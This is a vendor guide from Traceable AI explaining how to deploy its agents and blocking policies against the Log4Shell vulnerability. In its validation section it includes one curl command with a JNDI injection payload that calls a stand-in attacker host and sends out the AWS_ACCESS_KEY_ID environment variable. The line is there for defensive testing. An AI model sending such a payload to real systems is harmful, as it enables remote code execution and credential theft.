Log4Shell / Log4j Vulnerability Quick Start Protection Guide

Log4Shell / Log4j Vulnerability

Summary

Log4Shell is one of the most impactful vulnerabilities we have seen in recent times. Traceable AI provides quick and complete protection for your applications from being exploited by Log4Shell.  In most environments, Traceable AI can provide comprehensive coverage for securing cloud native applications, both at the edge and from within the application.

Here is how to use Traceable AI to provide protection for your applications in 4 simple steps.

Step Why
1. Sign up free for Traceable AI   For new Traceable AI users (existing users skip)
2. Install Traceable AI Platform Agent     Required
Then you must complete either steps 3 and/or 4 of the following
3. Install the tracing agent in your Java application

                AND / OR
Provides most comprehensive protection from known and unknown threats.
4. Install the tracing agent on your gateway(s) Provides signature based protection from known threats.  Helps mitigate DoS attacks.

Note: For existing Traceable AI users, you can skip steps 1 and 2 and focus on steps 3 and 4

Meet with a security expert

Our crack security research team is happy to meet with you to talk about Log4J or other challenges.

Complete protection against Log4Shell using Traceable AI

Step 1: Sign up free for Traceable AI

Using a business email, create an account and sign up for Traceable AI. You will need to confirm your email address as part of the signup process and log into your Traceable AI account.

Step 2: Install the Platform agent

The Platform Agent is an extension of the Traceable AI platform that runs local to your application environment. It is a required component which receives the data from the Tracing Agents, applies redaction, and then relays the data to the Traceable AI platform.

  1. After logging in, you’ll be shown the “Welcome to Traceable AI” screen. Click “Install Now”.
  2. After logging in, you’ll be shown the “Getting started with Traceable AI” screen. Click “Next”.
  3. You’ll be asked to install a Traceable AI Platform Agent.
  4. Select where and how you’d like to install it and follow the provided instructions.
  5. Once the upper right says you are “Successfully deployed”, click the “Next” button
install now button
install-platform-agent

Step 3: Install the Tracing Agent in your Java Application

Install the Java agent to comprehensively protect the app from Log4Shell exploits. Traceable will automatically protect the application from invoking the JNDI lookup calls all together.

No configurations or blocking rules required with this option.

1. You should find yourself on the “Install Tracing Agents” screen which will show you installation options.

2. On the “In-App Instrumentation” panel in the upper left, click on the Java icon to get instructions on installing the Java Tracing Agent.

3. Select your installation target (Java should already be selected as the language), and then follow the provided instructions.

That’s it! You are protected from the LogShell vulnerabilities!

Keep reading and follow Step 4 to block Log4Shell at your gateway(s)

Step 4: Install the Tracing Agent on your Gateway(s) (Optional)

To block the Log4Shell related exploits with signature based protection for known threats, and to mitigate the Log4j vulnerability related DoS attacks, you can install a Traceable AI Tracing Agent on your gateways. This can be installed on API gateways, load balancers, or proxies by doing the following steps.

You should find yourself back on the “Install Tracing Agents” screen which will show you installation options.

platform-agent-install

1. Install the Tracing Agent(s)

There are multiple Tracing Agent installation options. You can install on any number of gateways. Follow the appropriate instructions below.

If installing a Tracing Agent in NGINX

  1. Click on the NGINX icon in the “Webservers” tile to get detailed instructions.
  2. On the “Installing Traceable Agents – NGINX” screen, follow the instructions for your OS to install the agent into NGINX.
  3. Once the upper right says you are “Successfully deployed” click the “Back to Tracing Agents” link in the upper left part of the screen.
install-nginx-agent

If installing a Tracing Agent in the Kong API Gateway

Follow the detailed instructions in the installation documentation.

install-kong-agent

If installing a Tracing Agent on another supported gateway

Visit the appropriate installation documentation.

docs-tracing-agent-page

2. Confirm Configurations

Next, make sure that everything is enabled properly for detection and blocking from your gateways.

a. We need to leave the guided setup and go to the administration screen. To do this, click on “Cancel” in the upper left.

cancel-install-guide

b. From the user menu in the upper right corner, select “Administration”

admin-menu

c. On the Administration screen, select “Policies” on the left menu (under the “Protection” section) (1), then make sure that Detection is “Enabled” (2).

admin-detection-enabled

d. On the same “Policies” screen (1) , scroll down until you see the “Known Vulnerabilities” section. Make sure that “Java Application Attacks” is enabled (2). Then click on the “Blocking Settings” link to the right of it (3), and make sure that both the “Java Log4j” rules are also enabled (4).

admin-blocking-settings

e. Congratulations! You are now set up for signature based detection and blocking of known attacks at your edge. You can close this admin window using the “Close” control at the upper left corner of the window.

admin-close

CONGRATULATIONS:

You are now comprehensively protected against the Log4Shell vulnerability at both the edge and within your application.

NOTE: By default, Traceable Java tracing agent will block all JNDI lookups.  if your existing application cannot function and log properly with JNDI Lookup disabled, you can still enjoy the protection of Traceable. To NOT disable JNDI lookup, set environment variable on the application pod as follows:

env var TA_BLOCKING_LOG4J2_JNDI=false

We’re with you

If you encounter any issues with deployment or use please reach out with any comments, questions, or concerns to support@traceable.ai or on our support website.

Validate Your Protection

A) Have your test tools send the malicious payloads to the application, you can also use a simple script and use curl commands to hit the right endpoints within your application.

curl http://<host:port>/<url> -H ‘X-Api-Version: ${jndi:ldap://attacker.host.name/${env:AWS_ACCESS_KEY_ID}}’

Please replace host, port, url to the right values for your application.

B) You will be able to see the details of all attackers attempting to exploit this vulnerability under the Attackers and Events page.

C) You can click through the details above to see the details of the security event and all details about the attacker including user/IP information, location, User agent etc

Attacks blocked at the edge using the above Policy approach will show up under Events -> Blocked with Sub Category – Java Log4j: JNDI Exploitation (CVE-2021-44228) (T900).

Attacks blocked within the application will indicate Java Log4j in the events description, these have been blocked automatically for you with our unique tracing approach, no configs, no blocking rules required !!

D) Go through the Analysis/Traces to see details of the individual requests and responses where Log4Shell exploits were detected and blocked.

Current coverage as of 12/20/2021

For CVE-2021-44228, CVE-2021-45046, CVE-2021-45105 use Traceable AI Java Agent 1.0.5 to address / protect.

You are now comprehensively protected against the Log4Shell vulnerability at both the edge and within your application, we continue to research on more details coming up with other variants of the vulnerability and will continue to update our protection mechanisms to keep your applications and API’s protected !!